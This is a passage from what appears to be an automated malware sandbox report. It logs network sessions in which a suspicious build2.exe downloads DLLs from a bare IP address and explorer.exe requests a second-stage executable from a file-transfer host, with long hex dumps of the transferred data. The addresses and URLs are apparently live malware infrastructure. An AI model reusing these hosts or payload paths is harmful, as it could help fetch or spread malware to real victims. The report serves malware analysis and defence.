                                                                                              Data Ascii: o}T$0E@$@D$PD$PVWt$D$T$tB)r>T$L$D$$1L$(1de^_[]@EPpt'u?hEpheL$$T$ *T$hEph
                                                                                              2024-05-25 19:30:18 UTC16384INData Raw: 68 7c ec 8b 44 24 0c 89 46 68 83 7c 24 04 01 75 72 8b 56 64 8d 1c 40 c1 e3 04 83 7c 1a 1c 00 74 4b 8b 4e 48 8b 01 85 c0 74 42 3d 58 00 1a 10 75 34 8b 86 a8 00 00 00 8b be ac 00 00 00 83 c0 04 83 d7 00 89 74 24 04 89 d6 8b 54 1a 18 0f af fa f7 e2 01 fa 52 50 51 e8 8c 45 12 00 89 f2 8b 74 24 10 83 c4 0c 8b 44 1a 18 89 46 38 31 ff 8b 4c 24 30 31 e9 e8 9f 24 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 89 74 24 04 8b 86 e8 00 00 00 89 44 24 08 85 c0 0f 84 88 01 00 00 83 7c 24 0c 00 0f 84 ac 00 00 00 8b 44 24 04 8b 70 64 85 f6 0f 84 9d 00 00 00 8b 44 24 0c 48 8d 3c 40 c1 e7 04 8b 44 3e 14 89 44 24 0c b9 00 02 00 00 31 d2 e8 56 3e ff ff 89 44 24 18 85 c0 0f 84 ce 02 00 00 8d 04 3e 89 44 24 14 8d 04 3e 83 c0 14 89 44 24 08 8b 5c 24 18 89 d8 83 c0 04 68 fc 01 00 00 6a 00
                                                                                              Data Ascii: h|D$Fh|$urVd@|tKNHtB=Xu4t$TRPQEt$DF81L$01$e^_[]t$D$|$D$pdD$H<@D>D$1V>D$>D$>D$\$hj
                                                                                              2024-05-25 19:30:18 UTC16384INData Raw: 00 00 00 8b 99 48 01 00 00 85 db 75 6b 8b 99 44 01 00 00 85 db 75 7b ff 81 40 01 00 00 8a 5d f3 88 d8 50 e8 d0 ca 11 00 83 c4 04 89 c3 85 c0 0f 84 a7 00 00 00 57 ff 75 e4 53 e8 0f 1c 18 00 83 c4 0c c6 04 3b 00 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c 89 18 0f b6 0b 80 b9 7a f8 19 10 00 78 4a 8b 4d e8 80 b9 d0 00 00 00 02 0f 83 83 00 00 00 83 c4 10 5e 5f 5b 5d c3 8b 03 89 81 48 01 00 00 e9 50 ff ff ff 8b 03 89 81 4c 01 00 00 e9 43 ff ff ff 8b 03 89 81 44 01 00 00 e9 36 ff ff ff ff 81 3c 01 00 00 e9 73 ff ff ff 80 f9 5b 0f b6 c9 ba 5d 00 00 00 0f 45 d1 89 55 ec 31 f6 46 89 df 8a 0c 33 3a 4d ec 74 06 88 0f 46 47 eb f2 8b 4d ec 38 4c 33 01 74 2d c6 07 00 eb 84 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c c7 00 00 00 00 00 e9 6d ff ff ff 8b 10 8b 4d e8 83 c4 10 5e 5f 5b 5d
                                                                                              Data Ascii: HukDu{@]PWuS;MzxJM^_[]HPLCD6<s[]EU1F3:MtFGM8L3t-MmM^_[]
                                                                                              2024-05-25 19:30:18 UTC16384INData Raw: f6 ff ff 8b 57 10 85 d2 74 09 8b 4c 24 20 e8 75 c2 ff ff 8b 7c 24 0c c7 47 10 00 00 00 00 e9 98 f6 ff ff 8b 06 89 81 44 01 00 00 e9 e3 f9 ff ff ff 81 3c 01 00 00 e9 80 fc ff ff 8b 44 24 14 80 b8 d0 00 00 00 00 0f 85 f3 fb ff ff 8b 44 24 20 8b 40 10 8b 4c 38 0c 83 79 48 00 0f 85 de fb ff ff ff 34 38 68 b4 e0 1c 10 ff 74 24 1c e8 06 09 00 00 83 c4 0c e9 c5 fb ff ff 8b 4c 24 1c e9 ae fd ff ff 8a 80 08 f7 19 10 3a 83 08 f7 19 10 0f 84 02 fa ff ff e9 c9 f9 ff ff 8b 44 24 20 80 b8 b1 00 00 00 00 0f 84 47 04 00 00 68 48 01 1d 10 ff 74 24 18 e8 5f 2a 01 00 83 c4 08 e9 33 f7 ff ff 8b 44 24 0c 80 48 1e 01 66 83 78 22 00 0f 8e a5 f5 ff ff 31 c9 b8 0e 00 00 00 8b 54 24 0c 8b 52 04 8b 74 02 f6 89 f7 c1 ef 04 83 e7 0f 83 ff 01 74 09 85 ff 75 0a e9 69 03 00 00 c6 44 02
                                                                                              Data Ascii: WtL$ u|$GD<D$D$ @L8yH48ht$L$:D$ GhHt$_*3D$Hfx"1T$RttuiD
                                                                                              2024-05-25 19:30:18 UTC16384INData Raw: c7 44 24 24 00 00 00 00 e9 0b f1 ff ff 8b 44 24 0c 8b 40 10 8b 40 1c 8b 4c 24 08 3b 41 3c 0f 84 95 ea ff ff 8b 7c 24 08 ff 37 68 27 f8 1c 10 ff 74 24 0c e8 e0 ea 00 00 83 c4 0c c7 44 24 24 00 00 00 00 e9 a2 f0 ff ff 68 48 e4 1b 10 8b 7c 24 08 57 e8 c1 ea 00 00 83 c4 08 be 0b 00 00 00 68 40 7e 1c 10 68 14 ce 01 00 68 40 bb 1b 10 68 78 fc 1b 10 56 e8 8f 4f 01 00 83 c4 14 89 77 0c c7 44 24 1c 00 00 00 00 e9 83 f8 ff ff 66 ba 1e 00 31 c0 85 c9 0f 85 54 f1 ff ff 31 d2 e9 5b f1 ff ff 31 ff 66 ba 28 00 be ff 0f 00 00 89 cb 31 c0 83 c2 28 89 f9 0f a4 d9 1c c1 e8 04 39 de bb 00 00 00 00 19 fb 89 cb 89 c7 0f 83 f2 f0 ff ff eb df a9 fd ff ff ff 74 65 31 f6 46 b8 ec bb 1b 10 e9 c1 fd ff ff 31 c0 e9 85 f2 ff ff c7 44 24 18 00 00 00 00 e9 36 f8 ff ff 8b 40 14 e9 d1 e9
                                                                                              Data Ascii: D$$D$@@L$;A<|$7h't$D$$hH|$Wh@~hh@hxVOwD$f1T1[1f(1(9te1F1D$6@


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              23192.168.2.44980065.109.242.594435316C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-05-25 19:30:21 UTC174OUTGET /softokn3.dll HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                                              Host: 65.109.242.59
                                                                                              Cache-Control: no-cache
                                                                                              2024-05-25 19:30:21 UTC246INHTTP/1.1 200 OK
                                                                                              Server: nginx
                                                                                              Date: Sat, 25 May 2024 19:30:21 GMT
                                                                                              Content-Type: application/octet-stream
                                                                                              Content-Length: 257872
                                                                                              Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                              Connection: close
                                                                                              ETag: "6315a9f4-3ef50"
                                                                                              Accept-Ranges: bytes
                                                                                              2024-05-25 19:30:21 UTC16138INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00
                                                                                              Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSw
                                                                                              2024-05-25 19:30:21 UTC16384INData Raw: ff 89 85 f4 fe ff ff c7 85 f8 fe ff ff 04 00 00 00 8d 85 f0 fe ff ff 6a 01 50 53 57 e8 85 af 00 00 83 c4 10 89 c6 85 c0 75 3f 8b 85 ec fe ff ff 83 c0 fd 83 f8 01 77 25 be 30 00 00 00 83 3d 28 9a 03 10 00 75 23 83 3d 50 90 03 10 00 74 0e be 01 01 00 00 f6 05 20 9a 03 10 01 74 0c 53 57 e8 e2 b9 00 00 83 c4 08 89 c6 83 3d 2c 9a 03 10 00 0f 84 5e ff ff ff 8b 85 ec fe ff ff 83 c0 fe 83 f8 02 0f 87 4c ff ff ff 56 53 57 68 85 6b 03 10 68 00 01 00 00 8d 85 f0 fe ff ff 50 ff 15 1c 7c 03 10 83 c4 18 e9 2a ff ff ff cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 08 01 00 00 a1 14 90 03 10 31 e8 89 45 f0 c7 85 ec fe ff ff 00 00 00 00 be 30 00 00 00 83 3d 28 9a 03 10 00 74 17 8b 4d f0 31 e9 e8 28 8b 02 00 89 f0 81 c4 08 01 00 00 5e 5f 5b 5d c3 8b 5d 0c c7
                                                                                              Data Ascii: jPSWu?w%0=(u#=Pt tSW=,^LVSWhkhP|*USWV1E0=(tM1(^_[]]
                                                                                              2024-05-25 19:30:21 UTC16384INData Raw: ff 83 c4 10 85 c0 0f 85 6b 03 00 00 57 e8 c4 9d ff ff 83 c4 04 ff 75 e8 53 57 e8 f7 9d ff ff 83 c4 0c ff 75 e8 8d 45 e8 50 53 57 e8 26 9e ff ff 83 c4 10 85 c0 0f 85 3c 03 00 00 8b 4d c8 83 c1 01 8b 75 e4 8b 45 dc 01 f0 3b 4d c0 0f 85 6c ff ff ff 31 f6 e9 20 03 00 00 31 f6 ff 35 30 9a 03 10 ff 15 f0 7b 03 10 83 c4 04 a1 34 9a 03 10 85 c0 74 15 6a 01 50 e8 57 4e 02 00 83 c4 08 c7 05 34 9a 03 10 00 00 00 00 a1 38 9a 03 10 85 c0 74 15 6a 01 50 e8 39 4e 02 00 83 c4 08 c7 05 38 9a 03 10 00 00 00 00 a1 3c 9a 03 10 85 c0 74 15 6a 01 50 e8 1b 4e 02 00 83 c4 08 c7 05 3c 9a 03 10 00 00 00 00 56 e8 e8 4d 02 00 83 c4 04 a3 34 9a 03 10 8b 47 38 a3 40 9a 03 10 8b 47 28 a3 44 9a 03 10 8b 47 2c a3 48 9a 03 10 8d 47 04 50 e8 bf 4d 02 00 83 c4 04 a3 38 9a 03 10 ff 75 0c e8
                                                                                              Data Ascii: kWuSWuEPSW&<MuE;Ml1 150{4tjPWN48tjP9N8<tjPN<VM4G8@G(DG,HGPM8u
                                                                                              2024-05-25 19:30:21 UTC16384INData Raw: 10 88 41 03 0f b6 41 04 d1 e8 8a 80 68 f9 02 10 88 41 04 0f b6 41 05 d1 e8 8a 80 68 f9 02 10 88 41 05 0f b6 41 06 d1 e8 8a 80 68 f9 02 10 88 41 06 0f b6 41 07 d1 e8 8a 80 68 f9 02 10 88 41 07 ba 01 01 01 01 8b 31 31 d6 33 51 04 b8 01 00 00 00 09 f2 0f 84 37 01 00 00 ba 1f 1f 1f 1f 33 11 be 0e 0e 0e 0e 33 71 04 09 d6 0f 84 20 01 00 00 ba e0 e0 e0 e0 33 11 be f1 f1 f1 f1 33 71 04 09 d6 0f 84 09 01 00 00 ba fe fe fe fe 8b 31 31 d6 33 51 04 09 f2 0f 84 f5 00 00 00 ba 01 fe 01 fe 8b 31 31 d6 33 51 04 09 f2 0f 84 e1 00 00 00 ba fe 01 fe 01 8b 31 31 d6 33 51 04 09 f2 0f 84 cd 00 00 00 ba 1f e0 1f e0 33 11 be 0e f1 0e f1 33 71 04 09 d6 0f 84 b6 00 00 00 ba e0 1f e0 1f 33 11 be f1 0e f1 0e 33 71 04 09 d6 0f 84 9f 00 00 00 ba 01 e0 01 e0 33 11 be 01 f1 01 f1 33 71
                                                                                              Data Ascii: AAhAAhAAhAAhA113Q733q 33q113Q113Q113Q33q33q33q
                                                                                              2024-05-25 19:30:21 UTC16384INData Raw: 00 e9 21 07 00 00 3d 50 06 00 00 0f 8f aa 01 00 00 3d 51 05 00 00 74 2d 3d 52 05 00 00 74 12 3d 55 05 00 00 0f 85 0a 07 00 00 c7 47 0c 01 00 00 00 83 7b 04 00 0f 84 ec 06 00 00 83 7b 08 10 0f 85 e2 06 00 00 c7 47 18 10 00 00 00 83 7c 24 24 25 0f 85 fb 07 00 00 6a 11 ff 74 24 30 e8 44 c7 00 00 83 c4 08 85 c0 0f 84 78 09 00 00 89 c7 31 c0 81 3b 51 05 00 00 0f 95 c0 ff 77 1c 8b 4d 20 51 50 ff 73 04 ff 77 18 e8 09 1e ff ff 83 c4 14 8b 4c 24 28 89 41 64 57 e8 a9 c6 00 00 83 c4 04 8b 44 24 28 83 78 64 00 0f 84 bf 08 00 00 83 7d 20 00 b9 60 2a 00 10 ba 20 2a 00 10 0f 44 d1 89 50 74 c7 80 84 00 00 00 e0 29 00 10 e9 eb 08 00 00 3d 09 21 00 00 0f 8e 1c 02 00 00 3d 0a 21 00 00 0f 84 08 02 00 00 3d 0b 21 00 00 0f 84 23 02 00 00 3d 21 40 00 00 0f 85 37 06 00 00 83 7c
                                                                                              Data Ascii: !=P=Qt-=Rt=UG{{G|$$%jt$0Dx1;QwM QPswL$(AdWD$(xd} `* *DPt)=!=!=!#=!@7|
                                                                                              2024-05-25 19:30:21 UTC16384INData Raw: 14 90 03 10 31 e8 89 45 f0 ff 75 08 e8 35 ab 00 00 83 c4 04 85 c0 74 5f 89 c6 8b 78 38 bb 91 00 00 00 85 ff 74 56 83 3f 03 75 51 8b 4d 18 8b 47 04 83 7d 14 00 74 59 8b 5d 0c 85 c0 74 64 89 ce 8b 4d 08 89 da 6a 03 ff 75 10 e8 47 fa ff ff 83 c4 08 89 c3 85 c0 75 24 56 ff 75 14 ff 75 08 e8 72 fd ff ff 83 c4 0c 89 c6 8b 4d f0 31 e9 e8 a3 8b 01 00 89 f0 eb 11 bb b3 00 00 00 8b 4d f0 31 e9 e8 90 8b 01 00 89 d8 83 c4 10 5e 5f 5b 5d c3 85 c0 74 06 83 7f 68 00 74 5a 81 c7 90 00 00 00 eb 55 8b 01 89 45 e8 8b 47 64 89 45 e4 8b 4f 74 ff 15 00 a0 03 10 8d 45 ec ff 75 10 53 ff 75 e8 50 ff 75 14 ff 75 e4 ff d1 83 c4 18 85 c0 74 32 e8 a1 8d 01 00 50 e8 eb 84 00 00 83 c4 04 8b 55 ec 8b 4d 18 89 11 bb 50 01 00 00 3d 50 01 00 00 74 8a eb 18 83 c7 60 8b 07 89 01 31 db e9 7a
                                                                                              Data Ascii: 1Eu5t_x8tV?uQMG}tY]tdMjuGu$VuurM1M1^_[]thtZUEGdEOtEuSuPuut2PUMP=Pt`1z
                                                                                              2024-05-25 19:30:21 UTC16384INData Raw: d8 00 00 00 00 c7 45 d4 04 00 00 00 eb 18 0f 1f 84 00 00 00 00 00 8b 47 fc 8b 00 89 45 d8 83 c7 0c 83 c6 ff 74 5a 8b 47 f8 85 c0 74 19 3d 61 01 00 00 74 e2 8b 4f fc eb 15 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 8b 4f fc 8b 11 89 55 d4 ff 37 51 50 ff 75 dc e8 8c 53 00 00 83 c4 10 85 c0 74 bd 89 c3 e9 80 01 00 00 bf 02 00 00 00 e9 83 01 00 00 c7 45 d4 04 00 00 00 c7 45 d8 00 00 00 00 8b 45 10 8b 4d 0c 83 ec 1c 0f 28 05 40 fb 02 10 0f 11 44 24 0c 89 44 24 08 89 4c 24 04 8b 45 08 89 04 24 e8 fe 7c ff ff 83 c4 1c 85 c0 74 0c 89 c3 ff 75 dc e8 7d 5a 00 00 eb 3d 8b 7d 18 8b 5d 14 57 e8 8b 4d 01 00 83 c4 04 89 c6 89 7d ec 8d 45 ec 50 56 57 53 ff 75 08 e8 e8 9a ff ff 83 c4 14 85 c0 74 26 89 c3 ff 75 dc e8 47 5a 00 00 83 c4 04 56 e8 78 4d 01 00 83 c4 04 83 fb 40 bf
                                                                                              Data Ascii: EGEtZGt=atOf.OU7QPuStEEEM(@D$D$L$E$|tu}Z=}]WM}EPVWSut&uGZVxM@
                                                                                              2024-05-25 19:30:21 UTC16384INData Raw: 8b 48 38 b8 91 00 00 00 85 c9 74 4a 83 39 02 75 45 83 79 04 00 74 3f 8b 55 0c 8b 59 6c 83 c3 08 89 1f 31 c0 85 d2 74 2e b8 50 01 00 00 39 de 72 25 8b 01 89 02 8b 41 70 89 42 04 83 c2 08 ff 71 6c ff 71 64 52 e8 cc 0f 01 00 83 c4 0c 31 c0 eb 05 b8 b3 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 7d 10 a1 14 90 03 10 31 e8 89 45 f0 85 ff 0f 84 2d 01 00 00 8b 5d 0c 8b 33 ff 75 08 e8 b5 2a 00 00 83 c4 04 b9 b3 00 00 00 85 c0 0f 84 12 01 00 00 83 fe 0a 0f 87 f7 00 00 00 b9 78 06 00 00 0f a3 f1 73 12 8d 48 38 eb 1a 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 b9 83 01 00 00 0f a3 f1 73 e4 8d 48 34 8b 09 83 fe 0a 77 2f ba 78 06 00 00 0f a3 f2 73 12 83 c0 38 eb 1a 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 ba 83 01 00 00 0f a3 f2 73
                                                                                              Data Ascii: H8tJ9uEyt?UYl1t.P9r%ApBqlqdR1^_[]USWV}1E-]3u*xsH8f.sH4w/xs8f.s
                                                                                              2024-05-25 19:30:21 UTC16384INData Raw: cc cc cc cc cc cc 55 89 e5 53 57 56 ff 75 08 e8 c2 d8 ff ff 83 c4 04 85 c0 0f 84 9c 03 00 00 89 c6 c7 40 24 00 00 00 00 bf 02 00 00 00 83 78 0c 00 0f 88 54 03 00 00 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 8b 46 34 8b 5e 40 8d 4b 01 89 4e 40 50 ff 15 10 7c 03 10 83 c4 04 83 fb 2c 0f 8f 29 03 00 00 6b c3 54 8d 0c 06 83 c1 64 89 4c 06 5c c7 44 06 64 57 43 53 ce c7 44 06 60 04 00 00 00 c7 44 06 58 00 00 00 00 c7 44 06 54 00 00 00 00 0f 57 c0 0f 11 44 06 44 83 7e 0c 00 0f 88 ea 02 00 00 8d 1c 06 83 c3 44 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 69 4b 10 c5 90 c6 6a 8b 86 0c 0f 00 00 83 c0 ff 21 c8 8b 8c 86 10 0f 00 00 89 0b c7 43 04 00 00 00 00 8b 8c 86 10 0f 00 00 85 c9 74 03 89 59 04 89 9c 86 10 0f 00 00 ff 76 34 ff 15 10 7c 03 10 83 c4 04 83 7e 0c 00 0f 88 8b 02 00
                                                                                              Data Ascii: USWVu@$xTv4{F4^@KN@P|,)kTdL\DdWCSD`DXDTWDD~Dv4{iKj!CtYv4|~
                                                                                              2024-05-25 19:30:21 UTC16384INData Raw: 00 89 f8 81 c4 3c 01 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 89 d6 89 cf 8b 5d 08 8b 4b 24 ff 15 00 a0 03 10 ff 75 14 ff 75 10 ff 75 0c 53 ff d1 83 c4 10 85 c0 75 1e 31 c0 39 5e 34 0f 94 c0 89 f9 89 f2 ff 75 14 ff 75 10 ff 75 0c 50 e8 1c 2b 00 00 83 c4 10 5e 5f 5b 5d c3 cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 45 08 8b 0d 14 90 03 10 31 e9 89 4d f0 c7 45 ec 00 00 00 00 85 c0 74 63 8b 75 10 8b 58 34 85 db 74 5d 85 f6 74 5f 8b 4d 0c 8d 45 e8 8d 7d ec 89 f2 50 57 e8 8e 00 00 00 83 c4 08 85 c0 74 60 89 c7 8b 45 ec 89 45 e4 8b 4b 14 ff 15 00 a0 03 10 ff 75 14 56 57 53 8b 5d e4 ff d1 83 c4 10 89 c6 85 db 74 40 57 e8 96 8d 00 00 83 c4 04 ff 75 e8 53 e8 b4 8d 00 00 83 c4 08 eb 29 31 f6 eb 25 8b 18 85 f6 75 a1 8b 4b 14 ff 15 00 a0 03 10 ff
                                                                                              Data Ascii: <^_[]USWV]K$uuuSu19^4uuuP+^_[]USWVE1MEtcuX4t]t_ME}PWt`EEKuVWS]t@WuS)1%uK


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              24192.168.2.44980165.109.242.594435316C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-05-25 19:30:22 UTC178OUTGET /vcruntime140.dll HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                                              Host: 65.109.242.59
                                                                                              Cache-Control: no-cache
                                                                                              2024-05-25 19:30:23 UTC245INHTTP/1.1 200 OK
                                                                                              Server: nginx
                                                                                              Date: Sat, 25 May 2024 19:30:22 GMT
                                                                                              Content-Type: application/octet-stream
                                                                                              Content-Length: 80880
                                                                                              Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                              Connection: close
                                                                                              ETag: "6315a9f4-13bf0"
                                                                                              Accept-Ranges: bytes
                                                                                              2024-05-25 19:30:23 UTC16139INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22
                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL|0]"
                                                                                              2024-05-25 19:30:23 UTC16384INData Raw: ff ff eb 1e 0f b6 4e 03 0f b6 42 03 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 6f 05 00 00 8b 46 04 3b 42 04 74 4f 0f b6 f8 0f b6 42 04 2b f8 75 18 0f b6 7e 05 0f b6 42 05 2b f8 75 0c 0f b6 7e 06 0f b6 42 06 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 07 0f b6 42 07 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 0e 05 00 00 8b 46 08 3b 42 08 74 4f 0f b6 f8 0f b6 42 08 2b f8 75 18 0f b6 7e 09 0f b6 42 09 2b f8 75 0c 0f b6 7e 0a 0f b6 42 0a 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 0b 0f b6 42 0b 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 ad 04 00 00 8b 46 0c 3b 42 0c 74 4f 0f b6 f8 0f b6 42 0c 2b f8 75 18
                                                                                              Data Ascii: NB+t3E3oF;BtOB+u~B+u~B+t3MNB+t3E3F;BtOB+u~B+u~B+t3MNB+t3E3F;BtOB+u
                                                                                              2024-05-25 19:30:23 UTC16384INData Raw: 08 00 00 59 6a 28 8d 4d 80 8b f0 e8 67 f3 ff ff 56 8d 4d f0 51 8b c8 e8 0a f7 ff ff 6a 29 8d 85 70 ff ff ff 50 8d 4d f0 e8 1b f7 ff ff 50 8d 4d f8 e8 78 f7 ff ff 81 7d dc 00 08 00 00 75 1a 8b c3 25 00 07 00 00 3d 00 02 00 00 74 0c 8d 45 98 50 8d 4d f8 e8 55 f7 ff ff a1 98 f2 00 10 c1 e8 13 f7 d0 a8 01 8d 45 cc 50 74 11 e8 92 2e 00 00 59 50 8d 4d f8 e8 34 f7 ff ff eb 0f e8 81 2e 00 00 59 50 8d 4d f8 e8 9f f8 ff ff 8d 45 cc 50 e8 69 23 00 00 59 50 8d 4d f8 e8 10 f7 ff ff a1 98 f2 00 10 c1 e8 08 f7 d0 a8 01 8d 45 cc 50 74 11 e8 30 3e 00 00 59 50 8d 4d f8 e8 ef f6 ff ff eb 0f e8 1f 3e 00 00 59 50 8d 4d f8 e8 5a f8 ff ff 8d 45 cc 50 e8 6a 19 00 00 59 50 8d 4d f8 e8 47 f8 ff ff a1 98 f2 00 10 c1 e8 02 f7 d0 a8 01 74 20 85 ff 74 1c 8b 45 f8 89 07 8b 45 fc 89 47
                                                                                              Data Ascii: Yj(MgVMQj)pPMPMx}u%=tEPMUEPt.YPM4.YPMEPi#YPMEPt0>YPM>YPMZEPjYPMGt tEEG
                                                                                              2024-05-25 19:30:23 UTC16384INData Raw: 0f 83 fa 10 74 15 b8 ff ff 00 00 e9 f7 01 00 00 81 c9 80 00 00 00 eb 03 83 c9 40 83 e0 06 2b c7 0f 84 df 01 00 00 2b c6 74 1e 2b c6 74 0f 2b c6 75 d4 81 c9 00 04 00 00 e9 c8 01 00 00 81 c9 00 01 00 00 e9 bd 01 00 00 81 c9 00 02 00 00 e9 b2 01 00 00 2b c6 75 af 8d 51 01 89 15 90 f2 00 10 8a 02 3c 30 7c 2a 3c 39 7f 26 0f be c0 83 c2 d1 03 c2 a3 90 f2 00 10 e8 8c fe ff ff 0d 00 00 01 00 e9 81 01 00 00 b8 fe ff 00 00 e9 77 01 00 00 b9 ff ff 00 00 e9 dc 00 00 00 83 f8 2f 0f 8e 63 ff ff ff 8b f2 83 f8 35 7e 62 83 f8 41 0f 85 53 ff ff ff 81 c9 00 90 00 00 e9 b8 00 00 00 b9 fe ff 00 00 4a e9 ad 00 00 00 81 c9 00 98 00 00 e9 a2 00 00 00 83 e8 43 0f 84 94 00 00 00 83 e8 01 0f 84 83 00 00 00 83 e8 01 74 76 83 e8 0d 0f 85 12 ff ff ff 42 89 15 90 f2 00 10 8b f2 8a 0a
                                                                                              Data Ascii: t@++t+t+u+uQ<0|*<9&w/c5~bASJCtvB
                                                                                              2024-05-25 19:30:23 UTC15589INData Raw: ae e8 7c cd cc c1 be ea d2 ff 35 4e c0 ce b5 7a ad bb a6 bb 2e dc 94 e9 f3 1e 7d e0 ec 28 a3 07 82 66 5a c3 5b 5a cb ec 03 c9 e3 2c 94 15 21 2b a0 f9 d9 9b 4b e7 b6 de eb 20 51 8c 3e fa 2c 23 d5 18 b0 f0 b1 a0 70 6c 7a ef 8b 83 48 a6 3a 02 06 ef a0 8a 2c b7 88 45 30 82 05 ff 30 82 03 e7 a0 03 02 01 02 02 13 33 00 00 01 51 9e 8d 8f 40 71 a3 0e 41 00 00 00 00 01 51 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 7e 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 28 30 26 06 03 55 04 03 13 1f 4d 69 63 72 6f 73 6f 66 74 20 43 6f 64 65 20 53 69 67 6e 69 6e
                                                                                              Data Ascii: |5Nz.}(fZ[Z,!+K Q>,#plzH:,E003Q@qAQ0*H0~10UUS10UWashington10URedmond10UMicrosoft Corporation1(0&UMicrosoft Code Signin


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              25192.168.2.449803104.196.109.2094432580C:\Windows\explorer.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-05-25 19:30:24 UTC182OUTGET /get/Dztc3/3edag44.exe HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Host: transfer.adttemp.com.br
                                                                                              2024-05-25 19:30:24 UTC289INHTTP/1.1 404 Not Found
                                                                                              Date: Sat, 25 May 2024 19:30:24 GMT
                                                                                              Server: Transfer.sh HTTP Server 1.0
                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-Made-With: <3 by DutchCoders
                                                                                              X-Served-By: Proudly served by DutchCoders
                                                                                              Content-Length: 15
                                                                                              Connection: close
                                                                                              2024-05-25 19:30:24 UTC15INData Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                                                                              Data Ascii: File not found


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
